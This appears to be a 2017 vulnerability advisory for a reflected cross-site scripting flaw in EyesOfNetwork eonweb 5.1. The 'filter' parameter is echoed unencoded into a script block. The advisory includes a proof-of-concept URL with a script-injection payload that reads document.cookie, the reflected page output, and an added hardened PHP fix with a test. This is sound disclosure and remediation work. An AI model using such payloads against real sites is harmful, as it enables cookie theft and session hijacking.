eyesofnetwork_eonweb 5.1_filter_cross site scripting (XSS)

jsj730sos edited this page Sep 26, 2017 · 6 revisions

Eonweb_module_module_filters_index.php cross-site scripting (XSS)

Powered by shaojiejiang from SkyEye Labs

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

module/module_filters/module_filters.php Line 32

<script type="text/javascript">
// on page load
$(document).ready(function() {
    $('#loading').hide();
    var filter = "<?php echo (isset($_GET["filter"])) ? $_GET["filter"] : false ?>";
    $("#filter_choice option[name='"+filter+"']").attr("selected","yes");

$_GET["filter"] is echoed into the script block without being filtered or encoded, which causes cross-site scripting (XSS).

EXP:

https://192.168.227.169/module/module_filters/index.php?filter=</script><script>alert(document.cookie)</script>

The returned page contains the payload:

<script type="text/javascript">
// on page load
$(document).ready(function() {
    $('#loading').hide();
    var filter = "</script><script>alert(document.cookie)</script>";
    $("#filter_choice option[name='"+filter+"']").attr("selected","yes");
    updateFields("/cache/admin-ged.xml");
});
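A hardened form of the vulnerable line, as an added example that is not part of the original page or the eonweb code base. The helper names `eon_js_literal` and `render_filter_script` are hypothetical, and the input is the filter value from the proof-of-concept URL above.

```php
<?php
// Added example: context-aware encoding for a value placed inside a <script> block.
// eon_js_literal() and render_filter_script() are hypothetical names, not eonweb functions.
function eon_js_literal($value)
{
    // A request such as filter[]=x arrives as an array; accept strings only.
    if (!is_string($value)) {
        $value = '';
    }
    // The JSON_HEX_* flags emit <, >, &, ' and " as \u00XX escapes, so the value
    // cannot close the string literal or the surrounding <script> element.
    $json = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    // json_encode() returns false on invalid UTF-8; fall back to an empty literal.
    return ($json === false) ? '""' : $json;
}

function render_filter_script($query)
{
    $filter = isset($query['filter']) ? $query['filter'] : '';
    // json_encode() supplies the quotes, so the template writes none around %s.
    $template = <<<'JS'
<script type="text/javascript">
$(document).ready(function() {
    $('#loading').hide();
    var filter = %s;
    // Compare the attribute value instead of concatenating it into a selector.
    $('#filter_choice option').filter(function() {
        return this.getAttribute('name') === filter;
    }).attr('selected', 'yes');
});
</script>
JS;
    return sprintf($template, eon_js_literal($filter)) . "\n";
}

// Constructed input: the filter value taken from the proof-of-concept URL.
$page = render_filter_script(array('filter' => '</script><script>alert(document.cookie)</script>'));
echo $page;
// The payload must not survive as markup in the response.
if (strpos($page, '</script><script>') !== false) {
    fwrite(STDERR, "payload still present in output\n");
    exit(1);
}
```

Run it with the PHP CLI: the emitted literal carries `\u003C` and `\u003E` in place of the angle brackets, so the HTML parser never sees a closing script tag inside the data.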